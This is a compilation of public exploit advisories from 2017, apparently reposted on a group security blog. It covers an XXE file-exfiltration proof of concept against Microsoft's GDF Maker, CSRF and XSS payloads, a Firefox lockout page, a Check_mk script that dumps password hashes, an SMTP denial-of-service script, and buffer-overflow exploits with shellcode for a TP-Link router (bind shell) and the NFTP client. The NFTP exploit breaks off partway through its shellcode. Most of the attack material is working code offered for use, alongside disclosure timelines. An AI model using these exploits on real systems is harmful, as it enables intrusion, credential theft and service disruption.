[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-GAME-DEFINITION-FILE-MAKER-v6.3.9600-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
===========
GDFMaker v6.3.9600.16384
Game Definition File Editor (gdfmaker.exe)
The Game Definition File Editor is a graphical utility designed for creating localized game definition files (GDFs)
as well as the necessary resource compiler scripts to compile game-definition files. The GDF editor uses a project-based
format to organize data.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Security Issue:
================
If a user loads an attacker supplied "GDFMakerProject" file type into GDF Maker using Ctrl+O or file menu, local files can be exfiltrated
to remote attacker controlled server, as gdfmaker.exe is vulnerable to XML External Entity Expansion attacks.
gdfmaker.exe can be found on Windows systems as part of Windows Kits: "C:\Program Files (x86)\Windows Kits\8.1\bin\x86\"
Note: The malicious file has to be opened using Ctrl + O or File / Open, double clicking does not seem to trigger it.
Victim may see an error like ... "There is an error in XML document(2,11)" and we get the victims file sent to our remote server.
Exploit/POC:
=============
Steal "msdfmap.ini" used by Remote MS ADO services POC.
1) "PWN.GDFMakerProject"
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "C:\Windows\msdfmap.ini">
<!ENTITY % sp SYSTEM "http://127.0.0.1:8000/exfil.dtd">
%sp;
%param3;
%exfil;
]>
2) "exfil.dtd"
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'http://localhost:8000/%data3;'>">
3) Start our file listener on Port 8000
C:\>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
4) Open the infected file using Ctrl+O or File Menu Open methods.
BOOOOM!
127.0.0.1 - - [18/Oct/2017 14:17:54] "GET /exfil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [18/Oct/2017 14:17:54] code 404, message File not found
127.0.0.1 - - [18/Oct/2017 14:17:54] "GET /;%5Bconnect%20name%5D%20will%20modify%20the%20connection%20if%20ADC.connect=%22name%22%0D%0A;%5Bconnect%20default%5D%20will%20modify%20the%20connection%20if%20name%20is%20not%20found%0D%0A;%5Bsql%20name%5D%20will%20modify%20the%20Sql%20if%20ADC.sql=%22name(args)%22%0D%0A;%5Bsql%20default%5D%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found%0D%0A;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.%0D%0A;Only%20the%20Sql%20strings%20support%20parameters%20using%20%22?%22%0D%0A;The%20override%20strings%20must%20not%20equal%20%22%22%20or%
20they%20are%20ignored%0D%0A;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored%0D%0A;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored%0D%0A;Access=NoAccess%0D%0A;Access=ReadOnly%0D%0A;Access=ReadWrite%0D%0A;%5Buserlist%20name%5D%20allows%20specific%20users%20to%20have%20special%20access%0D%0A;The%20Access%20is%20computed%20as%20follows:%0D%0A;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.%0D%0A;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.%0D%0A%
0D%0A%5Bconnect%20default%5D%0D%0A;If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccess%0D%0AAccess=NoAccess%0D%0A%0D%0A%5Bsql%20default%5D%0D%0A;If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.%0D%0ASql=%22%20%22%0D%0A%0D%0A%5Bconnect%20CustomerDatabase%5D%0D%0AAccess=ReadWrite%0D%0AConnect=%22DSN=AdvWorks%22%0D%0A%0D%0A%5Bsql%20CustomerById%5D%0D%0ASql=%22SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?%22%0D%0A%0D%0A%5Bconnect%20AuthorDatabase%5D%0D%0AAccess=ReadOnly%0D%0AConnect=%22DSN
=MyLibraryInfo;UID=MyUserID;PWD=MyPassword%22%0D%0A%0D%0A%5Buserlist%20AuthorDatabase%5D%0D%0AAdministrator=ReadWrite%0D%0A%0D%0A%5Bsql%20AuthorById%5D%0D%0ASql=%22SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?%22 HTTP/1.1" 404 -
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: October 8, 2016
Vendor reply : October 8, 2016 "Upon investigation we have determined that this does not meet the bar for security servicing as it would require an individual to download a malicious file from an untrusted source"
vendor reply : November 5, 2016 "opened case 35611"
vendor reply : November 8, 2016 "We have successfully reproduced the issue that you reported to us"
Vendor reply : December 5, 2016 "will be fixing this issue in next version of SDK which will be released along with major Windows update"
October 18, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863547125
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: ZKTime Web Software 2.0 - Cross Site Request Forgery
CVE-ID: CVE-2017-13129
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind
------------------------------------------
Product description:
ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
provided a stable communication for devices through GPRS/WAN, hence, users
can access the software anywhere by their Web Browser to remotely manage
hundreds of T&A terminals under complex network condition (WLAN). The
Application has an administrator role and application user role.
Attack Description:
The ZKTime Web Software allows the Administrator to elevate the privileges
of the application user by simple click of a radio button namely
"superuser". However when the request is generated there are no random
tokens attached to this request to prevent any kind of Cross Site Request
Forgery attacks. Moreover there no other protections (like administrator
password verification etc.) mechanisms in place to block any kind of forged
requests.
An Attacker takes advantage of this scenario and creates a crafted link to
add himself as an administrator to the ZKTime Web Software. He then uses
social engineering methods to trick the administrator into click the forged
http request. The request is executed and the attacker becomes the
Administrator of the
ZKTime Web Software.
Proof of Concept Code:
Forged HTTP Request used by the attacker:
<html>
<body>
<form action="http://XX.XX.XX.46:8081/data/auth/User/14/
<http://xx.xx.xx.46:8081/data/auth/User/14/>" method="POST">
<input type="hidden" name="pk" value="" />
<input type="hidden" name="username" value="Pentestuser1" />
<input type="hidden" name="Password" value="" />
<input type="hidden" name="ResetPassword" value="" />
<input type="hidden" name="fpidnum" value="" />
<input type="hidden" name="fpcount" value="0" />
<input type="hidden" name="tlng" value="en" />
<input type="hidden" name="first_name" value="Pentest" />
<input type="hidden" name="last_name" value="User" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="is_staff" value="on" />
<input type="hidden" name="is_superuser" value="on" />
<input type="hidden" name="last_login" value="2017-08-20 14:14:34" />
<input type="hidden" name="initial-last_login" value="2017-08-20
14:14:34" />
<input type="hidden" name="date_joined" value="2017-08-20 14:14:34" />
<input type="hidden" name="initial-date_joined" value="2017-08-20
14:14:34" />
<input type="hidden" name="finnger" value="" />
<input type="hidden" name="template" value="" />
<input type="hidden" name="finger10" value="" />
<input type="hidden" name="template10" value="" />
<input type="hidden" name="delfp" value="" />
<input type="hidden" name="actflag" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact:
If the vulnerability is successfully exploited than an attacker (who would
be a normal user of the web application) can escalate his privileges and
become the administrator of ZK Time Web Software.
References:
http://seclists.org/fulldisclosure/2017/Sep/38
http://seclists.org/bugtraq/2017/Sep/19
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13129
Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed
Exploit Title: ZKTime Web Software 2.0 - Broken Authentication
CVE-ID: CVE-2017-14680
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind
------------------------------------------
Product description:
ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
provided a stable communication for devices through GPRS/WAN, hence, users
can access the software anywhere by their Web Browser to remotely manage
hundreds of T&A terminals under complex network condition (WLAN). The
Application has an administrator role and application user role.
Attack Description:
The Application is a time attendance software which allows users to
download their time and attendance data from the application in a PDF
Format. The data includes their employee’s id, user-id, gender,
birth-dates, phone numbers and access-areas. These PDF Files however are
not properly authenticated. If any user get access to the file-download
link, he can go ahead and download these files directly without any
authentication.
Proof of Concept Links:
1) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144237.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144237.pdf>
2) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144238.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144238.pdf>
3) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144239.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144239.pdf>
Impact:
Personal details pertaining to the employees of the company are disclosed
without their permissions. This leads to violation of user privacy.
Moreover the information available can be used to mount further attacks.
References:
http://seclists.org/fulldisclosure/2017/Sep/39
http://seclists.org/bugtraq/2017/Sep/20
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14680
Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed
# Exploit Title: Mozilla Firefox < 55 - Forcibly make someone view a web content
# Category: Denial of Service
# Date: 5/11/17
# CVE : CVE-2017-7783
# Affected Version: < Mozilla Firefox 55
# Tested on: Windows/Linux
# Software Link: https://www.mozilla.org/en-US/firefox/52.0/releasenotes/
# Exploit Author: Amit Sangra
# Website: http://CyberCriminals.net
# Description:
If a long user name is used in a username/password combination in a site URL (such as http://UserName:Password@example.com), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service.
# Impact:
An attacker can create a webpage having some content and exploit.
Now once a victim visits this webpage, his browser gets locked out and he is forcibly made to view attacker supplied content.
# Exploit:
<?php
$exploit=str_repeat(chr(0x41),10000);
$location="http://Username".$exploit.":Password@Firefox.com";
echo "<center><h1>Firefox Lockout Vulnerability</h1>";
//Content to be forcibly viewed
echo "<iframe width=854 height=480 src=https://www.youtube.com/embed/QH2-TGUlwu4?autoplay=1 frameborder=0 allowfullscreen></iframe></center>";
//End
echo "<script>setTimeout(\"location.href ='".$location."';\",10000);</script>";
?>
# Solution:
Update to version 55
https://www.mozilla.org/en-US/firefox/55.0/releasenotes/
# Mozilla Foundation Security Advisory:
https://www.mozilla.org/en-US/security/advisories/mfsa2017-18/#CVE-2017-7783
import urllib2
import base64
import hashlib
from optparse import *
import sys
import urllibbanner = (
"___________________________________________________________________________\n"
"WR940N Authenticated Remote Code Exploit\n"
"This exploit will open a bind shell on the remote target\n"
"The port is 31337, you can change that in the code if you wish\n"
"This exploit requires authentication, if you know the creds, then\n"
"use the -u -p options, otherwise default is admin:admin\n"
"___________________________________________________________________________"
)
def login(ip, user, pwd):
print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd)
#### Generate the auth cookie of the form b64enc('admin:' + md5('admin'))
hash = hashlib.md5()
hash.update(pwd)
auth_string = "%s:%s" %(user, hash.hexdigest())
encoded_string = base64.b64encode(auth_string)
print "[+] Encoded authorisation: %s" %encoded_string
#### Send the request
url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save"
print "[+] sending login to " + url
req = urllib2.Request(url)
req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string)
resp = urllib2.urlopen(req)
#### The server generates a random path for further requests, grab that here
data = resp.read()
next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3])
print "[+] Got random path for next stage, url is now %s" %next_url
return (next_url, encoded_string)
#custom bind shell shellcode with very simple xor encoder
#followed by a sleep syscall to flush cash before running
#bad chars = 0x20, 0x00
shellcode = (
#encoder
"\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99"
"\x27\xb2\x05\x4b" #0x27b2059f for first_exploit
"\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9"
"\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41"
"\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d"
"\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71"
"\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d"
"\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99"
"\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5"
"\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad"
"\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9"
"\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1"
"\x02\x2a\x18\x26\xae\x43\xff\xc1"
#sleep
"\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08"
"\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"
"\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c"
################ encoded shellcode ###############
"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06"
"\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff"
"\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d"
"\x7a\x69" #<————————- PORT 0x7a69 (31337)
"\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad"
"\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc"
"\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01"
"\x01\x0c\x24\x0f\x73\x50"
"\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f"
"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48"
"\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f"
"\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50"
"\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f"
"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c"
"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce"
"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"
"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02"
"\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"
"\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"
)
###### useful gadgets #######
nop = "\x22\x51\x44\x44"
gadg_1 = "\x2A\xB3\x7C\x60"
gadg_2 = "\x2A\xB1\x78\x40"
sleep_addr = "\x2a\xb3\x50\x90"
stack_gadg = "\x2A\xAF\x84\xC0"
call_code = "\x2A\xB2\xDC\xF0"
def first_exploit(url, auth):
# trash $s1 $ra
rop = "A"*164 + gadg_2 + gadg_1 + "B"*0x20 + sleep_addr + "C"*4
rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode
params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'}
new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params)
print "[+] sending exploit..."
print "[+] Wait a couple of seconds before connecting"
print "[+] When you are finished do http -r to reset the http service"
req = urllib2.Request(new_url)
req.add_header('Cookie', 'Authorization=Basic %s' %auth)
req.add_header('Referer', url + "DiagnosticRpm.htm")
resp = urllib2.urlopen(req)
def second_exploit(url, auth):
url = url + "WanStaticIpV6CfgRpm.htm?"
# trash s0 s1 s2 s3 s4 ret shellcode
payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c
payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4
payload += stack_gadg + "A"*4 + nop*10 + shellcode + "B"*7
print len(payload)
params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1',
'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000',
'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA',
'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'}
new_url = url + urllib.urlencode(params)
print "[+] sending exploit…"
print "[+] Wait a couple of seconds before connecting"
print "[+] When you are finished do http -r to reset the http service"
req = urllib2.Request(new_url)
req.add_header('Cookie', 'Authorization=Basic %s' %auth)
req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm")
resp = urllib2.urlopen(req)
if __name__ == '__main__':
print banner
username = "admin"
password = "admin"
parser = OptionParser()
parser.add_option("-t", "–target", dest="host",
help="target ip address")
parser.add_option("-u", "–user", dest="username",
help="username for authentication",
default="admin")
parser.add_option("-p", "–password", dest="password",
help="password for authentication",
default="admin")
(options, args) = parser.parse_args()
if options.host is None:
parser.error("[x] A host name is required at the minimum [x]")
if options.username is not None:
username = options.username
if options.password is not None:
password = options.password
(next_url, encoded_string) = login(options.host, username, password)
###### Both exploits result in the same bind shell ######
#first_exploit(data[0], data[1])
second_exploit(next_url, encoded_string).
1. ADVISORY INFORMATION
=======================
Product: Check_mk
Vendor URL: https://mathias-kettner.de/check_mk.html
Type: Race Condition [CWE-362]
Date found: 2017-09-21
Date published: 2017-10-18
CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14955
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.
4. INTRODUCTION
===============
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.
On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):
[..]
# Check_MK's monitoring contacts
filename = root_dir + "contacts.mk.new"
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
out.close()
os.rename(filename, filename[:-4])
# Users with passwords for Multisite
filename = multisite_dir + "users.mk.new"
make_nagios_directory(multisite_dir)
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
out.close()
os.rename(filename, filename[:-4])
[...]
When sending many concurrent authentication requests with an existing/valid
username, such as:
POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1
---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"
login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"
index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"
omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"
welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"
Login
---9519178121294961341040589727--
Then it could happen that one of both os.rename() calls references a non-
existing file, which has just been renamed by a previous thread. This causes the
Python script to fail and throw a crash report, which discloses a variety of
sensitive information, such as internal server paths, account details including
hashed passwords:
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
'contactgroups': ['all'],
'disable_notifications': False,
'email': u'admin@example.com',
'enforce_pw_change': False,
'last_pw_change': 0,
'last_seen': 0.0,
'locked': False,
'num_failed': 0,
'pager': '',
'password': '$1$400000$13371337asdfasdf',
'roles': ['admin'],
'serial': 2},
A script to automatically exploit this vulnerability can be found on [0].
6. POC
======
#!/usr/bin/python
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
# Version: <=3D 1.2.8p25
# Date: 2017-10-18
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on: 1.2.8p25
# CVE:=09=09 CVE-2017-14955
#
# Howto / Notes:
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to setup a local proxy to
# catch the dump. Happy brute forcing ;-)
import requests
import threading
try:
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
=09pass
# Config Me
target_url =3D "https://localhost/check_mk/login.py"
target_username =3D "omdadmin"
proxies =3D {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080',
}
def make_session():
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
'random'), '_login': (None, 'Login')})
=09return v.content
NUM =3D 50
threads =3D []
for i in range(NUM):
t =3D threading.Thread(target=3Dmake_session)
threads.append(t)
t.start()
7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.
The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (i.e. LDAP)
8. SOLUTION
===========
Update to 1.2.8p26.
9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure
10. REFERENCES
=============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
# Exploit Title: DOM Based Cross Site Scripting (XSS) - Logitech Media Server
# Shodan Dork: Logitech Media Server
# Date: 14/10/2017
# Exploit Author: Thiago "THX" Sena
# Vendor Homepage: https://www.logitech.com
# Tested on: windows 10
# CVE : CVE-2017-15687
-----------------------------------------------
PoC:
- First you go to ( http://IP:PORT/ )
- Then put the script ( <BODY ONLOAD=alert(document.cookie)> )
- ( http://IP:PORT/<BODY ONLOAD=alert(document.cookie)> )
- Xss Vulnerability
---------------------------------------------------
[Versões Afetadas]
7.7.3
7.7.5
7.9.1
7.7.2
7.7.1
7.7.6
7.9.0
[Request]
GET /%3Cbody%20onload=alert('Xss')%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0
Connection: close
Upgrade-Insecure-Requests: 1
# Exploit Title: Vulnerability Xss - TP-LINK TL-MR3220
# Date: 12/10/2017
# Exploit Author: Thiago "THX" Sena
# Vendor Homepage: http://www.tp-link.com.br
# Version: TL-MR3220
# Tested on: Windows 10
# CVE : CVE-2017-15291
Vulnerabilty: Cross-site scripting (XSS) in TP-LINK TL-MR3220
cve: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15291
---------------------------------------------------------------
PoC:
0x01 - First you go to ( http://IP:PORT/ )
0x02 - In the 'Wireless MAC Filtering' tab.
0x03 - Will add a new MAC Address.
0x04 - In 'Description' it will put the script ( <script>alert('XSS')</script> ) and complete the registration.
0x05 - Xss Vulnerability
--------------------------------------------------------------
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
#
# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2
# and earlier allows remote attackers to waste CPU resources (memory
# consumption) via unspecified vectors.
####################################
# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption)
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.argosoft.com
# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx
# Version: 1.0.0.2
# Tested on: Windows 10
# Category: Windows Remote Denial-of-Service
# CVE : CVE-2017-15223
import socket
from threading import Thread
def data():
ip = '127.0.0.1'
port = 25
counter = 50
string = '&'
while True:
try:
if counter >= 10000:
counter = 0
else:
counter = counter + 50
A = (string * counter) + 'user2@othermail.com'
print "String lenght: " + str(len(A))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5.0)
sock.connect((ip, port))
sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n')
sock.recv(1024)
sock.close()
except Exception as e:
continue
def main():
iterations = int(input("Threads: "))
for i in range(iterations):
t = Thread(target=data)
t.start()
if __name__ == '__main__':
main()
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
####################################
# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
# Date: 2017-10-21
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://ayukov.com/nftp/source-release.html
# Software Link: ftp://ftp.ayukov.com/pub/nftp/
# Version: v1.71, v1.72, v1.8, v2.0
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2017-15222
import socket
IP = '127.0.0.1'
port = 21
#(exec calc.exe)
shellcode=(
"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
